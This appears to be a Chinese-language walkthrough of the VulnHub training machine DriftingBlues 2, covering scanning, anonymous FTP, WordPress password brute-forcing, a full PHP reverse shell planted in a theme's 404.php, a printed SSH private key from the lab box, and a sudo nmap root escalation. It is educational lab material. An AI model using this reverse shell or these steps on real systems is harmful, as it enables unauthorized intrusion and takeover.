靶机渗透练习02-driftingblues2
时间:2024-01-05 10:37:01
靶机描述
靶机地址:https://www.vulnhub.com/entry/driftingblues-2,634/
Description
get flags
difficulty: easy
about vm: tested and exported from virtualbox. dhcp and nested vtx/amdv enabled. you can contact me by email (it should be on my profile) for troubleshooting or questions.
This works better with VirtualBox rather than VMware
一、搭建靶机环境
攻击机Kali:
IP地址:192.168.9.7
靶机:
IP地址:192.168.9.23
注:靶机与Kali的IP地址只需在同一局域网(同一网段,即两台虚拟机处于同一网络模式)
靶机环境建设如下
- 将下载的靶机环境导入 VritualBox,设置为 Host-Only 模式
- 将 VMware 中桥模式网卡设置 VritualBox 的 Host-only
二、实战
2.1网络扫描
2.1.1 启动靶机和Kali后进行扫描
方法一、arp-scan -I eth0 -l (指定网卡扫描)
arp-scan -I eth0 -l
方法二、masscan 扫描的网段 -p 扫描端口号
masscan 192.168.184.0/24 -p 80,22
方法三、netdiscover -i 网卡-r 网段
netdiscover -i eth0 -r 192.168.184.0/24
方法四,等你补充
2.1.2 检查靶机开口端口
使用nmap -A -sV -T4 -p- 靶机ip检查靶机开口端口
? kali nmap -A -sV -T4 -p- 192.168.9.23 Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-18 09:36 CST Nmap scan report for bogon (192.168.9.23) Host is up (0.00033s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_-rwxr-xr-x 1 ftp ftp 1403770 Dec 17 2020 secret.jpg 22/tcp open ssh OpenSSH 7.9p1 Debian 10 deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA) | 256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA) |_ 256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519) 80/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-title: Site doesn't have a title (text/html). |_http-server-header: Apache/2.4.38 (Debian) MAC Address: 08:00:27:B4:49:CC (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 4.X|5.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 OS details: Linux 4.15 - 5.6 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.33 ms bogon (192.168.9.23) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 15.12 seconds 21—ftp—ProFTPD–同时还有anonymous匿名登录
22—ssh—OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80—http—Apache httpd 2.4.38 ((Debian))
2.2枚举漏洞
2.2.1 21端口分析
根据 nmap 扫描结果可以发现有匿名登陆
ftp 192.168.9.23
输入密码:anonymous,成功登录,查看一下有啥东西
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Ahm1PzlL-1649840422439)(https://cdn.jsdelivr.net/gh/hirak0/Typora/img/image-20220218094136590.png)]
可以看到有一个图片文件:secret.jpg
下载文件:get secret.jpg
分析一下图片
先放一边
2.2.2 22 端口分析
一般只能暴力破解,暂时没有合适的字典
2.2.3 80端口分析
扫一下目录
dirsearch -u http://192.168.9.23/
访问http://192.168.9.23/blog/
当前页面除了发现是WordPress站,没有其他发现
查看一下源代码
DNS解析????
将driftingblues.box修改进hosts文件
除了界面有点颜色了,其他没有啥改变
在扫描一下目录
dirsearch -u http://driftingblues.box/blog/
扫描出了后台登录页面
2.3漏洞利用
2.3.1 使用 wpscan 获取账号密码
使用wpscan扫描一下
wpscan --url http://driftingblues.box/blog/ -e
成功拿到用户名albert
破解一下密码试试
wpscan --url http://driftingblues.box/blog/ -e u --passwords /usr/share/wordlists/rockyou.txt
利用得到的账户密码进行登录后台
根据经验,进入主题编辑界面
2.3.2 修改 404.php 获取 shell
利用kali自带的webshell源码
// php-reverse-shell - A Reverse Shell implementation in PHP. Comments stripped to slim it down. RE: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.9.7';
$port = 6666;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; sh -i';
$daemon = 0;
$debug = 0;
if (function_exists('pcntl_fork')) {
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
chdir("/");
umask(0);
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?>
将源码复制到404.php
Kali 开启监听:nc -lvp 6666
然后访问一个不存在的 URL:http://driftingblues.box/blog/index.php/1234
成功拿到shell
使用 python 切换 bash:python3 -c 'import pty; pty.spawn("/bin/bash")'
2.3.3 信息收集获取 ssh 私钥获取 shell
进入home发现用户freddie,并进入目录,发现user.txt,查看文件内容,无权限
再查看一下目录下有无其他文件
发现.ssh,进入该目录,查看目录文件
再次发现id_rsa可查看
www-data@driftingblues:/home/freddie/.ssh$ cat id_rsa
cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEAv/HVquua1jRNOCeHvQbB1CPsqkc6Y2N25ZpJ84H7DonP9CGo+vO/
gwHV7q4TsCfCK67x8uYoAOydIlIU6gwF17CpXydK52FxFfteLc0h9rkUKs8nIFxbxXBv8D
IiUwhtVTEy7ZcEYEBeC40LPhBB3/70NiTRHFXP0kOWCXLUZYrSwzpq+U+45JkzkrXYZUkL
hbHOoNFzVZTUESY/sO6/MZAGGCI2SytaIerWUiDCJB5vUB7cKuV6YwmSJw9rKKCSKWnfm+
bwAXZwL9iv+yTt5OiaY/81tzBC6WbbmIbdhibjQQS6AXRxwRdv7UrA5ymfktynDl4yOwX3
zO1cz4xK+wAAA8hn0zMfZ9MzHwAAAAdzc2gtcnNhAAABAQC/8dWq65rWNE04J4e9BsHUI+
yqRzpjY3blmknzgfsOic/0Iaj687+DAdXurhOwJ8IrrvHy5igA7J0iUhTqDAXXsKlfJ0rn
YXEV+14tzSH2uRQqzycgXFvFcG/wMiJTCG1VMTLtlwRgQF4LjQs+EEHf/vQ2JNEcVc/SQ5
YJctRlitLDOmr5T7jkmTOStdhlSQuFsc6g0XNVlNQRJj+w7r8xkAYYIjZLK1oh6tZSIMIk
Hm9QHtwq5XpjCZInD2sooJIpad+b5vABdnAv2K/7JO3k6Jpj/zW3MELpZtuYht2GJuNBBL
oBdHHBF2/tSsDnKZ+S3KcOXjI7BffM7VzPjEr7AAAAAwEAAQAAAQAWggBBM7GLbsSjUhdb
tiAihTfqW8HgB7jYgbgsQtCyyrxE73GGQ/DwJtX0UBtk67ScNL6Qcia8vQJMFP342AITYd
bqnovtCAMfxcMsccKK0PcpcfMvm0TzqRSnQOm/fNx9QfCr5aqQstuUVSy9UWC4KIhwlO6k
ePeOu3grkXiQk3uz+6H3MdXnfqgEp0bFr7cPfLgFlZuoUAiHlHoOpztP19DflVwJjJSLBT
8N+ccZIuo4z8GQK3I9kHBv7Tc1AIJLDXipHfYwYe+/2x1Xpxj7oPP6gXkmxqwQh8UQ8QBY
dT0J98HWEZctSl+MY9ybplnqeLdmfUPMlWAgOs2/dxlJAAAAgQCwZxd/EZuDde0bpgmmQ7
t5SCrDMpEb9phG8bSI9jiZNkbsgXAyj+kWRDiMvyXRjO+0Ojt97/xjmqvU07LX7wS0sTMs
QyyqBik+bFk9n2yLnJHtAsHxiEoNZx/+3s610i7KsFZQUT2FQjo0QOEoobALsviwjFXI1E
OsTmk2HN82rQAAAIEA7r1pXwyT0/zPQxxGt9YryNFl2s54xeerqKzRgIq2R+jlu4dxbVH1
FMBrPGF9razLqXlHDaRtl8Bk04SNmEfxyF+qQ9JFpY8ayQ1+G5kK0TeFvRpxYXrQH6HTMz
50wlwX9WqGWQMNzmAq0f/LMYovPaBfwK5N90lsm9zhnMLiTFcAAACBAM3SVsLgyB3B5RI6
9oZcVMQlh8NgXcQeAaioFjMRynjY1XB15nZ2rSg/GDMQ9HU0u6A9T3Me3mel/EEatQTwFQ
uPU+NjV7H3xFjTT1BNTQY7/te1gIQL4TFDhK5KeodP2PsfUdkFe2qemWBgLTa0MHY9awQM
j+//Yl8MfxNraE/9AAAADmZyZWRkaWVAdm1ob3N0AQIDBA==
-----END OPENSSH PRIVATE KEY-----
将私钥复制到本地,使用 ssh 尝试登陆
修改文件为 linux 下的换行:vi id_rsa
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-1C9TWIcW-1649840422447)(https://cdn.jsdelivr.net/gh/hirak0/Typora/img/image-20220218103644920.png)]
修改 SSH 私钥为只读权限:chmod 400 id_rsa
尝试登陆:ssh freddie@192.168.9.23 -i id_rsa
成功登录
成功拿到flag1
2.4权限提升
2.4.1 sudo 提权
发现可以利用nmap提权
去https://gtfobins.github.io/查找nmap
可利用这里的sudo 提权
使用第一种方法提权
TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF
成功提权
使用 python 切换 bash:python3 -c 'import pty; pty.spawn("/bin/bash")'
成功在root目录下找到flag2
总结
本节通过信息收集获取账号密码,利用wpscan扫描工具获取信息,进而登陆后台写入后门 getshell,然后信息收集获取 ssh 私钥获取 shell,最后利用 nmap 提权
- 目录扫描
- wpscan 工具使用
- Wordpress 后台主题编辑利用
- 信息收集获取 ssh 私钥获取 shell
- sudo 提权 nmap 提权
